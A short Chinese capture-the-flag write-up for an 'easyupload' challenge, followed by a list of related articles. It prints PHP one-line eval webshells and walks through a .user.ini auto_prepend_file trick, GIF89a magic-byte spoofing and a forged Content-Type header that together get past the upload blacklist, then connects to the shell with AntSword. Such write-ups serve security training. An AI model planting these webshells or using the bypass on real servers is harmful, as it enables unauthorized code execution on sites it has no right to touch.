CTF之easyupload

拿到题目发现是文件上传的漏洞,但是这个黑名单过滤的有点严格,无论是文件里还是文件后缀都不能出现php

那我们就用<?=eval($_POST['a']);?>来进行绕过(注意这里要加个GIF89a或者GIP87a进行欺骗)

但是后缀依然不能绕过怎么办?

接下来就要学新知识了

.user.ini文件

auto_prepend_file可以让所有的php文件自动的包含某个文件。

例如在.user.ini文件中写入

auto_prepend_file=shell.jpg

然后在shell.jpg中写入一个一句话木嘛

<?php eval($_P0ST['aaa']); ?>

那么和.user.ini和shell.jpg同一目录下的所有php文件都会包含shell.jpg文件。

这里上传.user.ini文件

文件里写:auto_prepend_file=a.jpg

注意:要进行抓包将文件类型改成Content-Type: image/jpeg并且也要加GIF89a或者GIF87a

然后再上传一个对应的木马文件,并且后缀为图片类型

最后就是用蚁剑连接了注意连接地址是/uploads/index.php

cyberpeace{8e50e0951cae4b39f7c312da788c71bb}

相关推荐
Jtti15 分钟前
SSH连接服务器超时?可能原因与解决方案
服务器·网络·php
小糖学代码2 小时前
网络:3.Socket编程TCP
网络·tcp/ip·php
BingoGo6 小时前
PHP8.5 的新 URI 扩展
后端·php
Whoami!7 小时前
5-4〔OSCP ◈ 研记〕❘ SQL注入攻击▸基于 UNION 的SQLi
网络安全·信息安全·sql注入·oscp
JaguarJack7 小时前
PHP8.5 的新 URI 扩展
后端·php
、花无将20 小时前
PHP:配置问题从而导致代码运行出现错误
开发语言·php
zorro_z21 小时前
ThinkPHP8学习篇(九):模型(一)
php
christine-rr1 天前
linux常用命令(6)——网络管理
linux·服务器·网络·ubuntu·网络安全
打酱油的;1 天前
【无标题】
爬虫·python·php
合作小小程序员小小店1 天前
Web渗透之身份认证与访问控制缺陷(越权(水平垂直),访问控制(没有验证),脆弱验证(Cookie,JWT,Session等))
安全·web安全·网络安全·asp.net·网络攻击模型